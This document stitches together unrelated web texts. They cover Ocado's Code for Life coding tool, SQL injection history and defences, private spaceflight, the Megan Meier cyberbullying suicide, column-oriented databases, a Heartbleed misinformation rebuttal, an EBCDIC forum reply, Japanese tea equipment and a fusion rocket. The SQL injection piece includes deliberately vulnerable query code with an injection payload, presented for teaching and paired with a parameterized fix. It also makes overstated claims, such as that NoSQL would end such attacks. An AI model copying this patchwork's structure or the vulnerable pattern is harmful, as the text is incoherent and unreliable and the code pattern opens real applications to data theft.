More recently, President Barack Obama formulated a new plan that calls on NASA to hire commercial companies to build so-called space taxis to ferry astronauts to and from the International Space Station.
Meanwhile, the space agency is charged with building next-generation heavy-lift engines and robotics technology for use in travel to the moon, to asteroids and to Mars.
The University of Washington says its researchers have developed a plasma that is encased in its own magnetic field. Nuclear fusion occurs when the plasma is compressed at high pressure with a magnetic field.
Researchers, they reported, have had successful lab tests and now are focusing on putting all the pieces together for an overall test.
The team has created a system in which a powerful magnetic field causes large metal rings to implode around the plasma, compressing it to a fusion state, to power the rocket. The converging rings merge to form a shell that ignites the fusion, but only for a few microseconds.
The fusion reactions quickly heat and ionize the shell. This super-heated, ionized metal is ejected out of the rocket nozzle at a high velocity, the university explained. This process is repeated every minute or so, propelling the spacecraft at high speeds.
"I think everybody was pleased to see confirmation of the principal mechanism that we're using to compress the plasma," Slough said. "We hope we can interest the world with the fact that fusion isn't always 40 years away and doesn't always cost $2 billion."
The university's rocket project is funded by NASA's Innovative Advanced Concepts Program.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld.
This story, "NASA-backed fusion rocket aims for human Mars mission" was originally published by Computerworld. | <urn:uuid:bba57af9-c3bc-4944-b1c2-f79240665ec2> | CC-MAIN-2017-04 | http://www.itworld.com/article/2708652/hardware/nasa-backed-fusion-rocket-aims-for-human-mars-mission.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00017-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951038 | 727 | 3.75 | 4 |
A deep dive into crowdsourced salary data from more than half a million employees shows that the gender pay gap is very real, and that male computer programmers make far more than their female counterparts.
The Economic Research arm of online jobs marketplace Glassdoor has issued a report titled Demystifying the Gender Pay Gap that attempts to explain why males are making so much more than females across industries and countries. While the researchers have come up with explanations for much of the pay gap in the United States, about a third of the gap is unexplained and presumed to be due to factors such as intentional or unintentional bias as well differences in pay negotiations.
Glassdoor acknowledges that its findings, based on salary and named-company data, are affected by the fact that those who shared information are “online employees” vs. those from the broader workforce who might not be inclined to share such data online (thus, Glassdoor’s view of the U.S. labor force, for example, would be different from that seen in the U.S. Census).
Having said that, the findings in Glassdoor’s study are striking. It shows that women earn about 76 cents for every dollar that men earn in the United States, though if you adjust those figures to take into consideration the industry in which people work, their level of experience, where they live and so forth, the gap is greatly reduced. This adjusted gender pay gap shows women making 94.6 cents for every dollar that men earn. Glassdoor finds a similar pattern in the U.K., Australia, Germany and France (I’ll be focusing on the U.S. from here on).
Glassdoor says the biggest cause of the gender pay gap in the U.S. “is women and men sorting into different jobs or industries with varying pay.” Age is also a factor, with the gap among employees 55 or older being about twice as large as the national average of 5.4%.
The adjusted gender pay gap is largest in the U.S. in healthcare (7.2%), insurance (7.2%) and mining/metals (6.8%), and smallest aerospace/defense (2.5%), agriculture/forestry (2.5%) and biotech/pharmaceuticals (3%).
Occupation-wise, male computer programmers make 28.1% more than their female counterparts, a slightly bigger gap than the next two occupations listed: chefs and dentists. The other IT occupation that stands out is information security specialist, where the gap favors males by 14.7%.
There are some occupations where the pay gap favors females. These include social worker, merchandiser and research assistant (in the 6.6% to 7.8% range), but the gaps are nowhere close to some of those that males enjoy.
“To help close the [overall] gender pay gap, we should focus on creating policies and programs that provide women with more access to career development and training, such as pay negotiation skills, to support them through their lives in any job or field they choose to enter,” says Dawn Lyon, VP of corporate affairs at Glassdoor, in a statement. Not surprisingly, Glassdoor, which specializes in sharing data about the realities of working at many companies, also advocates for more pay transparency at organizations.
Last month, I wrote in this blog about research that finds younger generation workers tend to engage in less secure behavior with technology than their older peers.
A Web survey of 1,245 people conducted by ZoneAlarm on the topic of personal computer security found only 31 percent of those aged 18-25 ranked security as the most important consideration when making decisions about their computers. That compared to 58 percent of Baby Boomers (those over age 45).
Another poll, this time conducted by Harris Interactive on behalf of security-products vendor ESET, seems to back that up. The poll of 2,129 U.S. adults aged 18 and over asked if the following statement applied to them:
“When creating any personal password (e.g., online accounts, computer networks, device access codes), I use a combination of numbers, letters and symbols.”
The percentage of respondents who said “yes” was 84 percent. However, the 18-34 age group got the lowest score on this question (77 percent) while the highest scoring demographic was the 55+ age group (89 percent).
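The survey statement leaves "combination" undefined; one natural reading is that a password must contain at least one of each character class. A minimal checker under that assumption:

```python
import string

def is_complex(password: str) -> bool:
    """One reading of the survey criterion: digits, letters AND symbols
    must all be present. (The poll itself defined no exact rule.)"""
    has_digit  = any(c in string.digits for c in password)
    has_letter = any(c in string.ascii_letters for c in password)
    has_symbol = any(c in string.punctuation for c in password)
    return has_digit and has_letter and has_symbol

print(is_complex("Tr0ub4dor&3"))   # True
print(is_complex("password123"))   # False -- no symbol
print(is_complex("123456"))        # False -- digits only
```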
From ESET Security Evangelist Stephen Cobb’s blog entry on the poll:
Perhaps the most worrying finding was that fewer students created complex passwords (77 percent) compared with individuals whose work status was full-time/self-employed/retired (each of those groups scored 86 percent). It is not clear whether this represents an easy-going attitude, a lack of awareness of online threats, or simply “password fatigue” (defined as “tired of having to remember all those different and difficult passwords”).
This pattern of younger people and students exhibiting riskier behavior with respect to online security was underlined by the responses to this statement:
“I use the same password for several of my personal online accounts.”
Some 46 percent of respondents admitted to using the same password for multiple accounts, with the group most likely to do this being those age 18-34 (49 percent). The least likely folks to do this were those 55 or older (43 percent). The largest groups of individuals to use the same password were females 18-34 (56 percent), with females 55+ being the least likely (35 percent).
While it’s clear from this poll, and many others, that security attitudes differ, depending on age, the bigger question is: how do security leaders manage that issue?
One place to start could be to conduct awareness testing and training to find out where the true vulnerabilities lie among staff, and address accordingly.
Lance Spitzner, of the SANS Institute's Securing the Human Program, recently spoke with CSO about the program’s free metric tools designed to give security leaders the ability to track and measure the impact of their own security awareness programs.
According to Spitzner, training director for the program, the tools can be used to improve training, demonstrate return on investment, or compare an organization's human risk to other organizations in an industry. All resources are free, developed by the community for the community, said Spitzner.
Does your organization have a glaring weak point within certain age groups? How do you know the answer? Leave a comment with your thoughts.
A global study from BCS, The Chartered Institute for IT, shows that access to information technology has a 'statistically significant, positive impact on life satisfaction'.
Additionally, the report showed women, those on low incomes or with few educational qualifications benefit most from access to IT. Not only do women gain more than men from access to, and use of, technology, they also achieve greater increased life satisfaction from using it. For disadvantaged women without access, therefore, the impact of digital exclusion could be the hardest.
Research involved a number of different elements brought together for the first time in this report. The first phase of research involved the analysis of large global social research data sets to establish whether there was a link between IT access and usage and life satisfaction.
This global analysis was followed up by in-depth research into how IT access and usage influences life satisfaction in the UK. The research in the UK included a unique analysis of data from the British Household Panel Survey plus original primary qualitative and quantitative research programmes.
Elizabeth Sparrow, President, BCS The Chartered Institute for IT said: "Too often, conventional wisdom assumes IT has a negative impact on life satisfaction, but the research has found the opposite to be true. IT has a direct positive impact on life satisfaction, even when controlling for income and other factors known to be important in determining well-being."
I would recommend this report, available from the BCS website http://www.bcs.org/server.php?show=ConWebDoc.35476 .
I have two issues with the report:
- It does not consider the impact of access to IT by people with disabilities.
- The report itself is available as a PDF but is not in a properly accessible format.
To respond to my first issue I will quote two phrases from the Executive Summary: "The analysis suggests that IT has an enabling and empowering role leading to a greater sense of freedom and control which in turn leads to greater life satisfaction." and "IT appears to empower the dis-empowered". Given that people with disabilities tend to be dependent on others, anything that can give them more freedom and control over their own lives is likely to lead to greater life satisfaction. So access to IT for people with disabilities is likely to have a major impact on their quality of life. Anything that takes that access away can now be seen as a double whammy.
Let us make everyone happier by giving everyone access to IT. | <urn:uuid:cf784c6f-5492-4d5e-82b7-18c7931087d1> | CC-MAIN-2017-04 | http://www.bloorresearch.com/blog/accessibility/the-information-dividend-why-it-makes-you-happier/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00163-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948766 | 497 | 2.703125 | 3 |
If you want to hide code or programs, most will advise you that, given the choice between server-side and client-side scripting, you should always choose server side, because it hides your code from prying eyes. Well, this is not always so.
Microsoft IIS has a nice bug: if you enter the name of a script-based page into your browser and put a full stop at the end of the URL, IIS returns the raw ASP page, rather than the script output.
This exploit was published some months ago and Microsoft provided a fix for it (which as you know does not mean anything at all, since the rate of internet bug-fixing is well below 45% :-) and now another new exploit has been found: under certain circumstances you can get hold of any ASP script, or even grab copies of executables sitting on your target server.
The exploit is based on the fact that the native Windows NT file system (NTFS) supports multiple data streams within a single file. Here is the relevant excerpt from the MS online documentation:
Multiple Data Streams
NTFS supports multiple data streams. The stream name identifies
a new data attribute on the file. Streams have separate opportunistic
locks, file locks, allocation sizes, and file sizes, but sharing is per file.
The following is an example of an alternate stream:
This feature permits related data to be managed as a single unit.
For example, Macintosh computers use this type of structure to
manage resource and data forks. Or, a company might create a program
to keep a list of changes to the file in an alternate stream, thus
keeping archive information with the current version of the file.
As another example, a library of files might exist where the files
are defined as alternate streams, as in the following example:
Suppose a "smart" compiler creates a file structure like the following example:
Note Because NTFS is not supported on floppy disks, when you copy an NTFS
file to a floppy disk, data streams and other attributes not supported by
FAT are lost.
The really important data stream is called $DATA, the stream that stores the actual content of the file. If you type in the URL of a script you are interested in and add ::$DATA to the end of it, the server returns the raw script source.
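The mechanics are simple enough to sketch. The function names and the example.com URL below are illustrative, not part of any tool; the trick itself was patched by Microsoft long ago. A fully qualified NTFS stream name has the form filename:streamname:$attribute, and the default (unnamed) data stream of file.asp is file.asp::$DATA, which is exactly the suffix that reached the raw file contents.

```python
def adsdata_probe_url(script_url: str) -> str:
    """Append the NTFS default-data-stream suffix used by the old IIS
    source-disclosure trick (illustrative only)."""
    return script_url + "::$DATA"

def split_stream_name(name: str):
    """Split an NTFS stream name 'file:stream:$attribute' into its parts."""
    parts = name.split(":")
    file, stream, attr = (parts + ["", ""])[:3]
    return file, stream, attr

print(adsdata_probe_url("http://www.example.com/default.asp"))
# -> http://www.example.com/default.asp::$DATA
print(split_stream_name("default.asp::$DATA"))
# -> ('default.asp', '', '$DATA')  -- the unnamed default data stream
```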
Obviously this can only happen if the files are being stored on an NTFS volume, so anyone running a web server off a FAT volume will not be affected by this exploit. But there are so many exploits out there for FAT volumes that getting those scripts is as easy as shooting at the red cross.
Note that this regards ASP, PL, IDC, SHTML and any other script or executable file types!
Never forget that the web root is usually \inetpub\wwwroot in M$ Internet Information Server and \home\httpd in Apache, and that lazy sysads (or sysads who have had enough of all the bugs) tend to stuff most things inside the root.
Another interesting example (for instance, for perusing bank accounts): if you find a 'forgotten' Access database file in some remote subdirectory of your target, you just need to point your browser to this file (if you have Access installed on your system) in order to see the whole database. It's read-only, of course, but hey: info is info!
Last week, the U.S. Department of Homeland Security's Science and Technology Directorate began a pilot of an interoperable communications system with the District of Columbia Office of the Chief Technology Officer (OCTO). The Radio Over Wireless Broadband (ROW-B) project will demonstrate how to connect existing wireless radio systems with advanced broadband technologies, such as laptops and smart phones.
In addition to traditional, handheld or vehicle-mounted radios, emergency responders are increasingly using separate, wireless broadband systems to communicate. Wireless broadband services are often supplied by a commercial cellular service provider. Because the radio and broadband systems serve specific and different needs, they were not designed to communicate with each other. The lack of interoperability between these two systems may compromise emergency response operations when responders using a broadband system are unable to communicate with responders using a radio system. That's why the pilot is so important.
"The ROW-B pilot represents an important milestone in our efforts to advance interoperability progress," said Dr. David Boyd, director of the DHS' Science and Technology Directorate's Command, Control and Interoperability Division. "The capability to communicate among radio and broadband system users will significantly improve emergency response operations by allowing non-radio users to communicate with response units in the field."
During July-August 2008, the ROW-B pilot connected OCTO's existing land mobile radio system--wireless radio systems that are either handheld or mounted in vehicles--with broadband devices using the Bridging Systems Interface. This allows a single user to reach multiple users through talk groups on a city-operated 700MHz broadband network. By allowing users to create talk groups in real-time, this technology saves critical response time. ROW-B also will use GIS technology to identify the location of other vehicles, equipment, and responders. GIS databases display these locations on maps that include important information such as roads, buildings, and fire hydrants--enabling emergency responders to access the locations of critical resources, and to form dynamic talk groups based on proximity. | <urn:uuid:595dd09c-5790-4026-ad98-92fc5e55e264> | CC-MAIN-2017-04 | http://www.govtech.com/public-safety/DHS-Pilots-Interoperable-Wireless-Network-with.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00493-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92389 | 411 | 2.796875 | 3 |
Imperva released a study analyzing 32 million passwords exposed in the Rockyou.com breach. The data provides a unique glimpse into the way that users select passwords and an opportunity to evaluate the true strength of these as a security mechanism.
In the past, password studies have focused mostly on surveys. Never before has there been such a high volume of real-world passwords to examine.
Key findings of the study include:
- The shortness and simplicity of passwords means many users select credentials that will make them susceptible to basic forms of cyber attacks known as “brute force attacks.”
- Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on). The most common password is “123456”.
- Recommendations for users and administrators for choosing strong passwords.
“Everyone needs to understand what the combination of poor passwords means in today’s world of automated cyber attacks: with only minimal effort, a hacker can gain access to one new account every second—or 1000 accounts every 17 minutes,” explained Imperva’s CTO Amichai Shulman.
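Shulman's "one account per second" figure holds up to a back-of-the-envelope check. The two rates below are my assumptions, not Imperva's: an automated attacker trying the single most common password against a long list of accounts, and a hit rate of roughly 0.9 percent (the approximate share of RockYou users who chose "123456").

```python
# Back-of-the-envelope check of the "one account per second" claim.
guesses_per_second = 110        # assumed throughput of an automated online attack
hit_rate = 0.009                # assumed: ~0.9% of users chose "123456"

accounts_per_second = guesses_per_second * hit_rate
accounts_per_17_min = accounts_per_second * 17 * 60

print(f"{accounts_per_second:.2f} accounts/second")          # ~1, matching the quote
print(f"{accounts_per_17_min:.0f} accounts per 17 minutes")  # ~1000
```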
The report also ranks the most commonly used passwords, with “123456” at the top of the list.
For enterprises, password insecurity can have serious consequences. “Employees using the same passwords on Facebook that they use in the workplace bring the possibility of compromising enterprise systems with insecure passwords, especially if they are using easy to crack passwords like “123456′,” said Shulman.
“The problem has changed very little over the past 20 years,” explained Shulman, referring to a 1990 Unix password study that showed a password selection pattern similar to what consumers select today. “It’s time for everyone to take password security seriously; it’s an important first step in data security.”
The complete report is available here. | <urn:uuid:b0612cd2-8ac1-49aa-a665-5fa15540a018> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/01/21/analysis-of-32-million-breached-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00245-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906439 | 392 | 2.859375 | 3 |
One doesn’t normally associate their favorite shampoo or laundry detergent with science, let alone multi-million dollar supercomputers, but in today’s modern world many well-known consumer goods are the products of extensive R&D. By using large-scale computational modeling to facilitate advanced product design, manufacturers can improve customer satisfaction and minimize costly design flaws.
A recent feature article on the Oak Ridge National Laboratory website recounts how the lab’s supercomputing resources enabled Procter & Gamble, the consumer products giant behind such brands as Downy, Head & Shoulders, Olay and Crest, to understand the molecular interactions that control the flow, thickness, performance and stability of P&G products.
Credit: Oak Ridge National Laboratory
Oak Ridge Science Writer Dawn Levy shares how Procter & Gamble and research partners at Temple University leveraged Oak Ridge systems, Jaguar and Titan, to perform challenging molecular dynamics simulations. The research team was specifically working to understand the interplay of fat-soluble molecules called lipids, and lipid vesicles, which are formed from lipid bilayers. Many products for the body and for laundry are comprised of these types of molecules, which directly impact the product’s performance and shelf-life.
“For Procter & Gamble, it is crucial to understand vesicle fusion if you want to extend the shelf lives of such products as fabric softeners, body washes, shampoos, lotions, and the like,” explained Temple’s Michael Klein, a National Academy of Sciences member who has collaborated with P&G for 15 years. “Vesicle fusion is a very hard science problem.”
The addition of perfumes and dyes can also affect stability, making the problem even more complex. Simulating the reorganization of lipid systems over time is thus a very challenging computational problem, surpassing the capabilities of P&G’s in-house machines. To perform these compute-intensive simulations, they turned to what was at the time the fastest supercomputer in the world, Jaguar, which has since been upgraded and re-launched as Titan.
The P&G/Temple University team was awarded time on Jaguar through the Innovative and Novel Computational Impact on Theory and Experiment (INCITE) program, which is jointly managed by the U.S. Department of Energy’s (DOE’s) Leadership Computing Facilities at Argonne and Oak Ridge national laboratories. The researchers accessed 69 million core hours on Jaguar over two years, enabling them to perform simulations of large, complex systems of lipid assemblies.
Because of Jaguar’s powerful capabilities, and also the GPU-equipped Titan prototype, called TitanDev, the team was able to carry out vesicle fusion simulations that had previously not been possible. As Levy concludes, the research highlights the importance of leadership computing facilities for solving “unsolvable” problems and providing a major competitive advantage. | <urn:uuid:72a83ad5-7ac1-406f-a00e-ab62ff573f40> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/08/27/product-design-gets-supercomputing-treatment/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00156-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935498 | 609 | 2.9375 | 3 |
Should Kids Have Cell Phones? How Young is “Too Young?”
I know a man with three kids, all older than his brother’s kids. I overheard him saying with a touch of disdain, “I can’t believe Dacota doesn’t even have a smartphone.” Dacota was 11. All of his kids had smartphones well before age 11.
Dacota’s father probably doesn’t want his daughter exposed to cyberbullying or online stalking, but on the other hand – a smartphone could be a lifesaver for her if she were to ever be abducted. Parents often ask me, “should kids have cell phones?” There are definitely advantages and disadvantages to giving your children cell phones – especially at a young age.
Advantages of Banning Smartphones For Kids
- A cell phone shouldn't be a babysitter. Going without one forces the old-fashioned way of communicating face-to-face and encourages family participation.
- Forces non-anonymous communication. No strangers, fewer dangers.
- Eliminates being tricked by an online predator into meeting that predator.
- Eliminates cyberbullying and questionable online behavior that’s more easily done anonymously.
- Frees parents from worrying that their child will download an inappropriate app.
- Prevents kids from video-chatting with strangers and sharing explicit images.
- Parents won’t worry about electronic communication stunting social development or leading to addiction.
Advantages of Allowing Kids to Have Smartphones
- Can be a godsend to socially awkward, shy kids who do poorly with face-to-face interaction, constantly worrying about the impression they make, their body language, whether their smile looks forced or their laugh sounds fake.
- The child who lacks the nerve to assert himself in person can do so online—without coming off as a bully. This may even prime them for developing more assertive skills in person.
- A child in danger can press a button and instantly summon help, whether they’ve been abducted, are lost, or injured.
- Parents can monitor the child in real time.
- Parents can instantly connect with the child instead of wondering where they are.
- Allows kids to keep up with technology.
Social Skills Development
This is a big issue. But don’t we all know that before the invention of smartphones, many children were already struggling with these issues? And conversely, many kids who have a mobile device at their hip have excellent face-to-face social skills.
Practice with in-person communication doesn’t always make perfect. A geeky awkward child can practice speaking before several people in person a thousand times and still not be very good at it. It’s like being pricked with a needle: the thousandth prick hurts just as much as the first prick.
Should Kids Have Cell Phones? Sure, With a Few Important Restrictions.
- A compromise is in order. Kids as young as 11 may benefit from a smartphone simply because it will allow their parents to track their location. The child can also summon help if in danger.
- Consider filtering software to prevent access to inappropriate sites.
- Get a feature phone (a “dumb phone”) that allows for direct communications without the worry of accessing the internet.
- Rules should be enforced, such as no cell phones at the dinner table, and the downloading of apps should be approved by the parents.
- Parents should have passwords to their child’s accounts—or there will be no accounts!
- Kids should be encouraged to report bullying or suspicious online behavior.
Frankly, I think it’s a bit risky to give a kid under the age of 16 full-blown access to the internet. You wouldn’t give them the keys to the car if they weren’t safe, and the internet is no different. There are plenty of sites that are just a click away that can damage their young minds. As parents, we control the information flow. If they’ve seen something they shouldn’t have, it’s because we allowed it or, at the very least, didn’t do enough to prevent it.
Latest posts by Robert Siciliano (see all)
WhiteHat Security recently released the results of a rather interesting study. Normally, studies of Web application security look at which type of vulnerability is most common or most dangerous to a web site. This study, however, looked into which programming language is the most secure among the many used to create Web-based applications.
As any frequent visitor to the various Internet forums knows, these results are sure to spark a plethora of flame wars among developers and security experts who stand up to defend their language of choice while finding flaws in another’s preference. These debates are healthy in that they do expose vulnerabilities in the various languages; however, many of the "facts" cited in them are based on hearsay and insinuation. By taking emotion out of the debate, this report is able to take an outside look at which language presents the most risk. To gauge the results more accurately, the report also ignored attack surface, looking at the number of vulnerabilities found in a Web application written in a particular language rather than how many vulnerable applications were found in a particular language across the sample.
The results were measured in many different ways, yet two separate categories garner the most interest. The first determined the average number of serious vulnerabilities found over an application's lifetime, broken down by the language in which it was written. The following ranks the languages in order:
Additionally, the length of time it took to fix a vulnerability found in a specific language is of interest. The report dissects these results by specific vulnerability, but by looking at two of the most common and most dangerous threats, SQL injection and cross-site scripting, you can see a rather frightening pattern. These are ranked from the highest to the lowest number of days a fix took to patch an XSS vulnerability:
With so many cyber criminals using automated tools to find and attack vulnerable web sites, these numbers are simply unacceptable. While fingers can be pointed at developers, management, executives, etc. the fact remains that tools need to be deployed to protect Web applications against these threats. Code reviews are great and they are the best way to find the source of a vulnerability so that it can be fixed for good, however the data shows that it cannot be the only route an organization takes to secure their web sites or they are as good as compromised. Without tools like Web Application Firewalls to stop attacks before the vulnerabilities can be fixed Web applications will continue to be sitting ducks. | <urn:uuid:0c876fd3-8ba8-42d9-9ff3-f8cdf209bd4c> | CC-MAIN-2017-04 | http://www.applicure.com/blog/study-determines-most-vulnerable-programming-lanuages | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00000-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963309 | 493 | 2.90625 | 3 |
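Web application firewalls buy time, but the lasting fix for a flaw like SQL injection still happens in code. As a hedged illustration (not drawn from the WhiteHat report; the table, column names, and data below are invented), here is how the flaw and its standard remedy, a parameterized query, look in Python with SQLite:

```python
import sqlite3

# Hypothetical table and data, invented purely for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?)",
                 [("alice", "admin"), ("bob", "user")])

attacker_input = "nobody' OR '1'='1"

# Vulnerable: concatenating input into the SQL string lets the attacker
# rewrite the query logic, so the WHERE clause matches every row.
unsafe_sql = "SELECT name FROM users WHERE name = '%s'" % attacker_input
leaked = conn.execute(unsafe_sql).fetchall()

# Root-cause fix: a bound parameter is treated strictly as data, never
# as SQL, so the same malicious input matches nothing.
safe = conn.execute("SELECT name FROM users WHERE name = ?",
                    (attacker_input,)).fetchall()

print(len(leaked), len(safe))  # 2 0
```

The same input leaks the entire table through the concatenated query and returns nothing through the parameterized one, which is why code-level fixes remove the vulnerability for good rather than merely blocking one attack pattern.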
Researchers at the California Institute of Technology have developed a laser that could quadruple internet speeds on the existing internet backbone.
In an interview with the Washington Post, Amnon Yariv, one of the developers and a former winner of the National Medal of Science, said the quadrupling of bandwidth is just the beginning for the technology.
"Our first run lasers, fabricated at Caltech, are capable of a 4x increase in the number of bytes-per-second carried by each channel," Yariv said in an email interview with the Washington Post. "This number will increase with our continuing work, but even at this level, the economic advantages are very big."
According to the Post, the laser operates closer to a single frequency than any other laser created before, enabling it to increase the amount of data it can carry through fiber optic cables.
Yariv put this in context by saying an internet backbone channel running at 40 Gbps today would increase to 160 Gbps by using their laser. The Post’s Brian Fung extrapolated that to the 400 Gbps speeds touted during Cisco’s unveiling of its CRS-X core routers last year, projecting 1,600 Gbps speeds attainable with Caltech's breakthrough, or "164,000 times faster than the 10 Mbps connection serving the average American home today."
A very helpful section of the Caltech researchers' findings published in the Proceedings of the National Academy of Sciences explains how they were able to work around an obstacle to higher bandwidth on fiber-optic networks.
"The data rate of modern optical fiber communication channels is increasingly constrained by the noise inherent in its principal light source: the semiconductor laser (SCL). Here, we examine the phase noise of SCLs due to the spontaneous recombination of excited carriers radiating into the lasing mode as mandated by quantum mechanics. By incorporating a very high-Q optical resonator as an integral part of a hybrid Si/III-V laser cavity, we can remove most of the modal energy from the optically lossy III-V active region, thereby reducing the spontaneous emission rate while increasing the number of phase-stabilizing stored photons."
As many will be quick to point out, this isn't likely to have a real-world impact on individual internet users any time soon. More broadly, however, this is the exact kind of breakthrough we'll need as the Internet of Things bring us closer to the 50 billion connected-device milestone that Cisco has projected for 2020. | <urn:uuid:7af87150-f7f0-4abb-a99e-284680551bcf> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2226560/opensource-subnet/laser-makes-internet-backbone-speeds-four-times-faster.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00210-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941194 | 511 | 3 | 3 |
Security “leaks” and breaches on popular services are becoming so common it’s almost comical. Except that if your account gets hacked, it could have dire consequences for your privacy and even financial security. Whether it’s a simple social network like Twitter (where 250,000 users’ details have been leaked) or your email account that gets hacked, here’s what you need to do to get control back and protect yourself going forward.
1. Find out if your account has been hacked. Sometimes it’s obvious when your account has been compromised. On Twitter, the hacker might post in your name. For your email account, all of the sudden family and friends are telling you you’ve been spamming them like some Nigerian scammer. Even worse, you might find fraudulent charges on your credit card if one of your online shopping accounts gets compromised.
If you’re not sure or you want to keep tabs on any possible leaks associated with your email address, sites like Pwned List and Should I Change My Password will check your email address against publicized databases of compromised accounts. Both will alert you, if you create an account, in the event your email winds up on any new compromises.
2. Try to regain control of your account immediately. First, scan your computer for malware to make sure your PC is clean. Then try to change the password on the account; you might get lucky. If you’re able to get in, also change the account security question. Because security questions are basic and easily guessable, it’s best to fib a bit on the answers. E.g., if asked for your favorite sports team, answer with your favorite quote.
Change your password to one that’s as long as possible, with mixed-case letters, numbers, and symbols. A passphrase is easier to remember than random alphanumeric characters, but the most important factors are length and that you don’t use the same password everywhere (more on that in a bit).
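As a practical aside (not part of the original checklist), a password or passphrase meeting these criteria can be generated with Python's standard `secrets` module. The tiny word list here is a made-up stand-in for a real one such as a Diceware list:

```python
import secrets
import string

def random_password(length=20):
    """A long password mixing cases, digits, and symbols."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

def random_passphrase(words, count=5, sep="-"):
    """Easier to remember at comparable strength: random dictionary words."""
    return sep.join(secrets.choice(words) for _ in range(count))

# Tiny stand-in word list; a real one has thousands of entries.
demo_words = ["correct", "horse", "battery", "staple", "orbit",
              "velvet", "anchor", "lantern", "quartz", "meadow"]
print(random_password())             # different every run
print(random_passphrase(demo_words))
```

`secrets` draws from the operating system's cryptographic random source, unlike the `random` module, which should never be used for passwords.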
If you can’t get back into your account, contact the security team for the service right away. If your email has been hacked, set up a new email address that you can use for secure communications only (and a separate new email address for stuff like newsletters).
3. Change your password for every site where you’ve used the same password. Using the same password for multiple accounts is convenient, but it leaves you vulnerable. If you’ve used the same password as the compromised account anywhere else, change it to a unique one right away.
A password manager like KeePass or LastPass makes it easier to create truly unique passwords for each site and service. Alternatively, you could create a master passphrase and tweak it slightly for each service; so, for example, you can use ThisIsMyPassword-forWebMail and ThisIsMyPassword-forGoofingOffonFacebook.
4. Notify friends and family of possible security issues. Often hackers will use your account to attach malware or send phishing emails to your contacts (e.g., “Dear Mom and Dad, I’m stranded in a foreign country and got robbed. Please send money.”) If your email has been hacked, warn your contacts not to click on any links from that account.
5. Set up credit monitoring. If the hacked account has any financial information (credit card or bank account, for example) tied to it, keep a close eye on your statements. Often, companies whose user databases have been hacked will offer customers free credit monitoring. If not, sites like Credit Karma and Credit Sesame can monitor your credit profile, so you’ll know if someone tries to open a new account in your name.
6. Revoke access to third-party applications. A hacker could possibly link your account to malicious third-party apps without your knowledge, so even if you regain control over your account, the hacker could still continue stealing your information. Take the time to review your permissions for these connected apps and remove any unknown or suspicious ones. MyPermissions is a useful landing page for seeing what apps have permissions on a variety of services, including Facebook, Twitter, Google, and Dropbox.
7. Protect your account. If two-factor authentication is an option, make sure you set that up on your account as soon as possible. Two-factor authentication is the best protection we have right now; it requires additional verification when anyone tries to log into your account from a new device. You should also sign up for alerts in Google, your bank accounts, and wherever possible for any suspicious activity in your account.
Photo by IntelFreePress Read more of Melanie Pinola’s Tech IT Out blog and follow the latest IT news at ITworld. Follow Melanie on Twitter at @melaniepinola. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:0d1d1300-59c2-4830-ae7b-b4e9d14ac318> | CC-MAIN-2017-04 | http://www.itworld.com/article/2712055/consumerization/what-to-do-when-you-ve-been-hacked.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00512-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911984 | 1,026 | 2.546875 | 3 |
A Rootkit is a program that attempts to hide itself, other files, or computer data so that they cannot be seen on the computer. Rootkits were first created for the Unix operating system where hackers would install a tool set that would replace common operating system files so that the system administrator could not detect their activities. As more advanced techniques were created, rootkits became even more stealthy by installing themselves in such a way that they are able to intercept commands on the operating system so that a user would only be shown what the rootkit wanted the user to see. This includes the ability to make it so files, directories, configuration files, and Windows Registry keys are invisible to a system administrator or user of the machine.
That said, a rootkit's success depends on its ability to remain undetected on a machine. Fortunately, most rootkits are not programmed well, and tell-tale signs become apparent, leading a user to investigate their machine more closely. With this in mind, anti-rootkit programs, or ARKs, were created that allow you to scan your computer for programs that are possibly intercepting instructions on the computer, which is a big sign that a rootkit may be installed. Some of the more popular Windows ARKs are RootRepeal and GMER, which contain a graphical user interface that quickly allows you to scan your computer for potential rootkits. When using these programs, though, you need to make sure you interpret the results properly, as false positives are common.
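The idea behind ARK scanners is often called "cross-view detection": list the same objects through two different interfaces and flag any discrepancy, since a rootkit typically filters only one of them. A real scanner compares user-mode API results against raw kernel or on-disk structures; the toy sketch below (my illustration, not taken from any actual ARK) merely compares Python's directory listing with the `ls` utility's output, and assumes a POSIX system and filenames without spaces:

```python
import os
import subprocess
import tempfile

def cross_view_listing(path):
    """Compare two views of the same directory and return what each view
    is missing. On a clean system both sets are empty; a name visible in
    one view but hidden in the other is the classic rootkit red flag."""
    api_view = set(os.listdir(path))                 # view 1: Python API
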